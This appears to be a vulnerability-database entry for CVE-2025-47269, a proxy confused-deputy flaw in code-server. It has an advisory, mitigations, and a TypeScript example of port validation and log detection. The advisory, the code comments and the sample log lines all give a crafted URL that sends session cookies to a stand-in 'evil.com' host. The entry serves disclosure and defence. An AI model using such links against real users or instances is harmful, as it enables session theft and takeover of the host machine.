CVE-2025-47269: CWE-441: Unintended Proxy or Intermediary ('Confused Deputy') in coder code-server
code-server runs VS Code on any machine anywhere through browser access. Prior to version 4.99.4, a maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the session token. Failure to properly validate the port for a proxy request can result in proxying to an arbitrary domain. The malicious URL `https://<code-server>/proxy/test@evil.com/path` would be proxied to `test@evil.com/path`, where the attacker could exfiltrate a user's session token. Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instance with reference to /proxy is affected. Normally this path is used to proxy local ports; however, the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which includes sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. This issue has been patched in version 4.99.4.
AI Analysis
Technical Summary
CVE-2025-47269 is a high-severity vulnerability affecting coder's code-server product prior to version 4.99.4. Code-server enables running Visual Studio Code on any machine with browser access, facilitating remote development environments. The vulnerability arises from improper validation of proxy subpath URLs used by the built-in proxy feature. Specifically, the proxy functionality is intended to forward requests to local ports, but because the port segment of the proxy URL is not validated as a port, an attacker can craft a malicious URL such as https://<code-server>/proxy/test@evil.com/path. This URL causes the proxy to forward the request to an arbitrary external domain controlled by the attacker instead of a local port. When a user clicks such a malicious link while authenticated to code-server, their session token (cookie) is sent to the attacker's domain. With the stolen session token, the attacker can authenticate as the user on the code-server instance, gaining full access to the remote development environment and underlying machine with the user's privileges. This is a classic example of a confused deputy vulnerability (CWE-441), where the proxy component is tricked into performing unauthorized actions on behalf of the attacker. The vulnerability requires user interaction (clicking a malicious link), but no prior authentication or elevated privileges are needed to exploit it. The CVSS 3.1 base score is 8.3 (high), reflecting network attack vector, low attack complexity, no privileges required, user interaction required, and high impact on confidentiality and integrity with limited availability impact. The issue has been patched in code-server version 4.99.4; earlier versions remain vulnerable. No known exploits in the wild have been reported yet.
This vulnerability poses a significant risk to environments using code-server with the built-in proxy enabled, especially in scenarios where users may be targeted with phishing or social engineering attacks to click malicious URLs.
Potential Impact
For European organizations, this vulnerability could lead to unauthorized access to internal development environments and potentially sensitive source code or intellectual property hosted on code-server instances. Since code-server is used to provide remote VS Code access, attackers gaining session tokens can execute arbitrary code or commands with the privileges of the compromised user, potentially leading to lateral movement within corporate networks. Confidentiality is severely impacted as session tokens and sensitive data can be exfiltrated. Integrity is also at risk since attackers can modify code or configurations. Availability impact is lower but could occur if attackers disrupt development workflows or deploy malicious code. Organizations in Europe relying on code-server for remote development, especially in sectors like software development, finance, and critical infrastructure, face risks of intellectual property theft, sabotage, or compliance violations under GDPR if personal data is exposed. The requirement for user interaction means phishing defenses and user awareness are critical. The vulnerability also raises concerns for cloud-hosted or hybrid environments common in European enterprises, where code-server instances may be exposed externally or internally.
Mitigation Recommendations
1. Immediately upgrade all code-server instances to version 4.99.4 or later, where the vulnerability is patched.
2. Disable the built-in proxy feature if it is not strictly necessary, reducing the attack surface.
3. Implement strict URL filtering and validation on any reverse proxies or web application firewalls (WAFs) in front of code-server to block /proxy/ URLs whose target segment is not a numeric local port (for example, one that contains an external domain or an "@").
4. Educate users about the risks of clicking untrusted links, especially those referencing code-server URLs with /proxy subpaths.
5. Monitor code-server logs for unusual proxy requests or access patterns that could indicate exploitation attempts.
6. Employ network segmentation to limit code-server access to trusted networks and users only.
7. Use multi-factor authentication (MFA) for code-server access to reduce risk from stolen session tokens.
8. Regularly audit and rotate session tokens or cookies to limit the window of token reuse.
9. Consider deploying endpoint protection solutions capable of detecting anomalous code-server activity.
These measures combined will reduce the likelihood and impact of exploitation beyond simply patching the vulnerability.
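The following is an added example and is not code-server's own code or its actual fix. It uses an assumed, simplified model of a `/proxy/<target>/<rest>` route to show two things the Technical Summary and mitigation items 3 and 5 describe: why the target segment must be validated as a numeric port before it is spliced into an upstream URL (an unvalidated `test@evil.com` segment turns `localhost:test` into URL userinfo and `evil.com` into the upstream host), and a detection pass over constructed access-log lines that flags /proxy/ requests whose target is not a local port. The route shape, the `127.0.0.1` upstream, and the sample log lines are all assumptions made for illustration.

```typescript
// Added example (not code-server's own code): a simplified, assumed model of a
// "/proxy/<target>/<rest>" route, showing (1) why the target segment must be
// validated as a numeric port before it is spliced into an upstream URL, and
// (2) a log check for requests that would violate that rule.

interface ProxyParts { target: string; rest: string }

// Split "/proxy/<target>/<rest>" into its target segment and remaining path.
function splitProxyPath(requestPath: string): ProxyParts | null {
  const m = /^\/proxy\/([^/]+)(\/.*)?$/.exec(requestPath);
  return m ? { target: m[1], rest: m[2] ?? "/" } : null;
}

// Assumed weak model of the pre-fix behaviour: the target segment is used as
// the port of a localhost URL without checking that it is a number. With
// "test@evil.com" the WHATWG URL parser reads "localhost:test" as userinfo and
// "evil.com" as the host, so the upstream request leaves the machine.
function weakUpstreamHost(requestPath: string): string | null {
  const parts = splitProxyPath(requestPath);
  if (!parts) return null;
  return new URL(`http://localhost:${parts.target}${parts.rest}`).hostname;
}

// Hardened rule: the target must be a decimal TCP port in 1..65535, nothing else.
function isLocalPort(target: string): boolean {
  if (!/^\d{1,5}$/.test(target)) return false;
  const port = Number(target);
  return port >= 1 && port <= 65535;
}

// Build the upstream URL only for a valid port; anything else is rejected and
// the caller should answer 400 rather than proxy. Number() drops leading zeros.
function hardenedUpstreamUrl(requestPath: string): string | null {
  const parts = splitProxyPath(requestPath);
  if (!parts || !isLocalPort(parts.target)) return null;
  return `http://127.0.0.1:${Number(parts.target)}${parts.rest}`;
}

// --- Detection side: flag /proxy/ requests whose target is not a local port ---

interface Finding { client: string; path: string; reason: string }

// Constructed sample access-log lines (common log format); not real traffic.
const SAMPLE_LOG: string[] = [
  '10.0.0.5 - - [21/May/2025:09:08:39 +0000] "GET /proxy/8080/app/index.html HTTP/1.1" 200 512',
  '10.0.0.5 - - [21/May/2025:09:09:02 +0000] "GET /proxy/test@evil.com/path HTTP/1.1" 302 0',
  '10.0.0.7 - - [21/May/2025:09:09:30 +0000] "GET /proxy/test%40evil.com/path?x=1 HTTP/1.1" 302 0',
  '10.0.0.9 - - [21/May/2025:09:10:11 +0000] "GET /login HTTP/1.1" 200 1024',
];

function findSuspiciousProxyRequests(lines: string[]): Finding[] {
  const findings: Finding[] = [];
  for (const line of lines) {
    const m = /^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP\/[\d.]+"/.exec(line);
    if (!m) continue;
    const client = m[1];
    const rawPath = m[2].split("?")[0];
    let path: string;
    try {
      path = decodeURIComponent(rawPath); // also catch %40-style encodings of "@"
    } catch (_err) {
      findings.push({ client, path: rawPath, reason: "undecodable percent-encoding" });
      continue;
    }
    const parts = splitProxyPath(path);
    if (!parts || isLocalPort(parts.target)) continue;
    const reason = parts.target.includes("@")
      ? "userinfo (@) in proxy target"
      : "proxy target is not a numeric port";
    findings.push({ client, path: rawPath, reason });
  }
  return findings;
}

// Stand-alone run: print the findings for the constructed log.
console.log(findSuspiciousProxyRequests(SAMPLE_LOG));
```

The same `isLocalPort` rule is what a reverse proxy or WAF in front of code-server would enforce on the first segment after `/proxy/` (mitigation 3); the log scanner decodes percent-encoding before checking so that `%40` does not slip past a literal `@` match.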
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Ireland, Belgium
Technical Details
- Data Version: 5.1
- Assigner Short Name: GitHub_M
- Date Reserved: 2025-05-05T16:53:10.371Z
- Cisa Enriched: true
- Cvss Version: 3.1
- State: PUBLISHED
Threat ID: 682d9817c4522896dcbd72de
Added to database: 5/21/2025, 9:08:39 AM
Last enriched: 7/4/2025, 11:26:55 PM
Last updated: 7/27/2025, 1:44:08 AM
Views: 14
Related Threats
- CVE-2025-54205: Out-of-bounds Read (CWE-125) in Adobe Substance3D - Sampler (Medium)
- CVE-2025-54195: Out-of-bounds Read (CWE-125) in Adobe Substance3D - Painter (Medium)
- CVE-2025-54194: Out-of-bounds Read (CWE-125) in Adobe Substance3D - Painter (Medium)
- CVE-2025-54193: Out-of-bounds Read (CWE-125) in Adobe Substance3D - Painter (Medium)
- CVE-2025-54192: Out-of-bounds Read (CWE-125) in Adobe Substance3D - Painter (Medium)